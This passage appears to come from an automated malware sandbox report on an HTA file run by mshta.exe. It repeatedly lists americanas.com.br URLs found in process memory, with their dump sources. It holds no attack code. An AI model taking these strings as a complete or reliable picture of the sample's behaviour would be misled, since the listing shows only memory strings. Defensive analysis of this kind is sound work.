https://www.americanas.com.br/hotsite/regras-do-site?chave=dk_hm_ft_00_06_regras
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511563098.000000000BDFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prf_hm_0_tt_8_
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prfm_mn_ss_22_a
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401910650.00000000069F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401959077.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/seguro-celular-roubo-furto?chave=pfm_hm_tt_1_0_seguro
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579924983.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508038235.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes24/
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termos
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_eletroportateis_topcategori
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_informatica_topcategorias
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579924983.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17V
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567232187.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502431408.00000000095D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?chave=brd_hm_tt_0_0_recebahoje
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entrega
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&ch
